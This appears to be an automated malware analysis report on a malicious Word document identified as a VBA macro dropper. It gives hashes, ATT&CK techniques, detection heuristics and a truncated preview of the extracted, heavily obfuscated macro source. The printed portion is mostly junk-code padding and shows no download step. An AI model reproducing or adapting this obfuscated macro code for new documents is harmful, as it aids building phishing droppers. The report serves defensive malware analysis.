Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a62dc67265d64c53…

MALICIOUS

Office (OLE)

204.5 KB Created: 2018-07-16 16:16:00 Authoring application: Microsoft Office Word First seen: 2019-05-16
MD5: 968fac151551d8b66ebff7c57a221f1e SHA-1: 3be3db5cb41739f03b05054a618b28ffaa7f2003 SHA-256: a62dc67265d64c53e14572d4942afc7bb4bdaab008732a22b6ee9afd4d1fe1f6
222 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1140 Deobfuscate/Decode Files or Information

The file is a malicious Office document containing VBA macros, specifically an AutoOpen macro that utilizes CreateObject. This indicates the macro is designed to execute code upon opening. The ClamAV detection 'Doc.Dropper.Agent-6616261-0' strongly suggests the document's purpose is to drop and execute a secondary payload. The VBA code itself appears obfuscated, hindering a precise analysis of its exact actions, but the overall pattern points to a downloader or dropper.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6616261-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6616261-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 54624 bytes
SHA-256: 9413bff51d5cb02494b214e02ebe23dd44ab1e6b5a1fbc6943f21d4fddd3dae3
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "FVXAnubdU4"
Public Function utpFMXhkf7e(ByRef zjacV7FNM As String, ByVal JPJ5DOAWg As String) As String
Dim CeHEcuzuq6() As Byte
#If 7 * 8 > 5 Then
Dim mYfx593UWwRhea As String
#Else
Dim mYfx593UWwRhea As Object
#End If
#If 9 * 8 > 8 Then
Dim T8kIZt5sMqDdrH As String
#Else
Dim T8kIZt5sMqDdrH As Object
#End If
Dim RAQusKA() As Byte
Dim bCz0f2Zggo As String
For DWY4UGli = 0 To 7
bCz0f2Zggo = bCz0f2Zggo + "q"
Next DWY4UGli
Dim iAEufZM As String
For qiH16c = 0 To 9
iAEufZM = iAEufZM + "D"
Next qiH16c
Dim CccO9FQd As Long
For vtKFw7 = 5 To 18
CccO9FQd = CccO9FQd + vtKFw7
Next vtKFw7
Dim zs1s5jE3 As Long
For TQbF1i3R = 5 To 13
zs1s5jE3 = zs1s5jE3 + TQbF1i3R
Next TQbF1i3R
Dim kegAN1Qe As String
For ppyKpmAr = 0 To 5
kegAN1Qe = kegAN1Qe + "w"
Next ppyKpmAr
Dim MnN9ptL As String
For nqMJhoY = 0 To 5
MnN9ptL = MnN9ptL + "L"
Next nqMJhoY
Dim r0q3YTR, cZxnY7 As Integer
r0q3YTR = 5 + 7
For DMib58PSm = 0 To 8
cZxnY7 = cZxnY7 + DMib58PSm
Next DMib58PSm
If cZxnY7 < DMib58PSm Then
Dim dkkNkSt As Long
End If
#If 8 * 9 > 6 Then
Dim dtr41wE5c0j5k4 As String
#Else
Dim dtr41wE5c0j5k4 As Object
#End If
Dim joQwFNZoLN5 As Long
Dim hZdYvA As Long
For fY9GSq = 7 To 10
hZdYvA = hZdYvA + fY9GSq
Next fY9GSq
Dim bEjG5k2GQe, su6zy3pDi0 As Integer
bEjG5k2GQe = 6 + 8
For qsB1MrR3j0 = 0 To 8
su6zy3pDi0 = su6zy3pDi0 + qsB1MrR3j0
Next qsB1MrR3j0
If su6zy3pDi0 < qsB1MrR3j0 Then
Dim mmIGNPdYo As Long
End If
For DjKgXK7To = 0 To 7
kajJLfaA = kajJLfaA + DjKgXK7To
Next DjKgXK7To
Dim T5XIGoRS As Long
For Gg22gen8Gy = 5 To 16
T5XIGoRS = T5XIGoRS + Gg22gen8Gy
Next Gg22gen8Gy
Dim iGbiyo8K, HYfPjKoT As Integer
iGbiyo8K = 6 + 9
For gKUJbRx = 0 To 9
HYfPjKoT = HYfPjKoT + gKUJbRx
Next gKUJbRx
If HYfPjKoT < gKUJbRx Then
Dim dRbgdvXM As Long
End If
Dim e3ks0ph As String
For BRp88LK = 0 To 6
e3ks0ph = e3ks0ph + "d"
Next BRp88LK
#If 8 * 7 > 9 Then
Dim pEcphpCsbFkXid As String
#Else
Dim pEcphpCsbFkXid As Object
#End If
Dim zRRqhnVAkK As Long
Dim saeeSMn5, VJKsvEn As Integer
saeeSMn5 = 5 + 7
For VHX5nZdP = 0 To 7
VJKsvEn = VJKsvEn + VHX5nZdP
Next VHX5nZdP
If VJKsvEn < VHX5nZdP Then
Dim TpqFkJ4 As Long
End If
Dim Bmnw7dEIm As Long
For jKYcxsH = 5 To 14
Bmnw7dEIm = Bmnw7dEIm + jKYcxsH
Next jKYcxsH
Dim qmQJG55NqQ As String
For SdL8OTXJ = 0 To 7
qmQJG55NqQ = qmQJG55NqQ + "D"
Next SdL8OTXJ
Dim YMA9ATBV As Long
For eeyOJNrtSN = 8 To 15
YMA9ATBV = YMA9ATBV + eeyOJNrtSN
Next eeyOJNrtSN
Dim KKvJzn As String
For Bw2Cc3c = 0 To 7
KKvJzn = KKvJzn + "X"
Next Bw2Cc3c
Dim Gcreamu As String
For cNvdsyL = 0 To 7
Gcreamu = Gcreamu + "t"
Next cNvdsyL
#If 8 * 8 > 9 Then
Dim tXy57mPGz05ZqQ As String
#Else
Dim tXy57mPGz05ZqQ As Object
#End If
#If 7 * 7 > 8 Then
Dim jIf5SvjmiZYqTE As String
#Else
Dim jIf5SvjmiZYqTE As Object
#End If
#If 8 * 7 > 7 Then
Dim pIuK9QhapQa7gb As String
#Else
Dim pIuK9QhapQa7gb As Object
#End If
Dim mEC0DGmgu7A As Long
Dim T41Dqr As String
For IAQH19euU = 0 To 6
T41Dqr = T41Dqr + "r"
Next IAQH19euU
Dim VQeJLX5 As String
For pAVIacwgeE = 0 To 9
VQeJLX5 = VQeJLX5 + "c"
Next pAVIacwgeE
Dim YK7w3pyxm As String
For lkUAax = 0 To 6
YK7w3pyxm = YK7w3pyxm + "A"
Next lkUAax
For vDjo1K = 0 To 8
SMnt0RCFZ = SMnt0RCFZ + vDjo1K
Next vDjo1K
Dim mn9mUg, krmgaw0Ibi As Integer
mn9mUg = 6 + 5
For ONSPkMM = 0 To 9
krmgaw0Ibi = krmgaw0Ibi + ONSPkMM
Next ONSPkMM
If krmgaw0Ibi < ONSPkMM Then
Dim HI6gCCWkc As Long
End If
#If 6 * 8 > 7 Then
Dim rI6VGKuM1MPh6e As String
#Else
Dim rI6VGKuM1MPh6e As Object
#End If
#If 9 * 8 > 6 Then
Dim VyIaAUibwabiJl As String
#Else
Dim VyIaAUibwabiJl As Object
#End If
Dim JNNFx9Fm As Long
Dim EnScmU9V7 As String
For s7vmxLbdLN = 0 To 5
EnScmU9V7 = EnScmU9V7 + "t"
Next s7vmxLbdLN
Dim OQft3e6hie
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.